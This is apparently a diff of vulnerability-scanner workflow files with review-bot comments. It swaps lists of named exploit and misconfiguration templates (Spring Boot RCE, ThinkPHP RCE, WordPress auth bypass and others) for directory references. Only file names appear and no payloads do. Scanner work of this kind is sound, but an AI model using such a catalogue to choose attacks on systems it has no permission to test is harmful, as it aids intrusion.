- template: misconfiguration/springboot/springboot-httptrace.yaml
|
||||
- template: misconfiguration/springboot/springboot-loggers.yaml
|
||||
- template: misconfiguration/springboot/springboot-mappings.yaml
|
||||
- template: misconfiguration/springboot/springboot-trace.yaml
|
||||
- template: vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
|
||||
- template: vulnerabilities/springboot/springboot-h2-db-rce.yaml
|
||||
- template: misconfiguration/springboot/
|
||||
- template: vulnerabilities/springboot/
|
||||
- template: cves/2018/CVE-2018-1271.yaml
|
||||
- template: cves/2020/CVE-2020-5410.yaml
|
||||
- template: cves/2020/CVE-2020-5410.yaml
|
|
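Review bot: `cves/2020/CVE-2020-5410.yaml` appears twice at the end of the hunk with identical text, i.e. it was removed and re-added, which usually indicates that only the file's trailing newline changed; harmless, but make sure the new file ends with a newline so the next edit does not show this churn again.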
@ -9,5 +9,4 @@ workflows:
|
|||
|
||||
- template: technologies/thinkcmf-detection.yaml
|
||||
subtemplates:
|
||||
- template: vulnerabilities/thinkcmf/thinkcmf-lfi.yaml
|
||||
- template: vulnerabilities/thinkcmf/thinkcmf-rce.yaml
|
||||
- template: vulnerabilities/thinkcmf/
|
|
@ -11,7 +11,4 @@ workflows:
|
|||
matchers:
|
||||
- name: thinkphp
|
||||
subtemplates:
|
||||
- template: vulnerabilities/thinkphp/thinkphp-2-rce.yaml
|
||||
- template: vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
|
||||
- template: vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
|
||||
- template: vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml
|
||||
- template: vulnerabilities/thinkphp/
|
|
@ -31,29 +31,5 @@ workflows:
|
|||
- template: cves/2020/CVE-2020-35951.yaml
|
||||
- template: cves/2020/CVE-2020-35489.yaml
|
||||
- template: cves/2021/CVE-2021-24146.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-total-upkeep-backup-download.yaml
|
||||
- template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
|
||||
- template: vulnerabilities/wordpress/sassy-social-share.yaml
|
||||
- template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-db-backup.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-debug-log.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-directory-listing.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-emergency-script.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-installer-log.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-user-enumeration.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-xmlrpc-listmethods.yaml
|
||||
- template: vulnerabilities/wordpress/wp-xmlrpc.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml
|
||||
- template: vulnerabilities/wordpress/wp-enabled-registration.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml
|
||||
- template: vulnerabilities/wordpress/wp-uploads-listing.yaml
|
||||
- template: vulnerabilities/wordpress/wp-license-file.yaml
|
||||
- template: vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml
|
||||
- template: cves/2021/CVE-2021-24176.yaml
|
||||
- template: vulnerabilities/wordpress/
|
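Review bot: `cves/2021/CVE-2021-24176.yaml` stays as an explicit entry after the `vulnerabilities/wordpress/` directory, so the convention is now "CVE templates listed one by one, everything else by directory"; that is fine, but a comment at the top of `subtemplates` saying so would tell the next contributor adding a WordPress CVE whether to list it here or rely on tags.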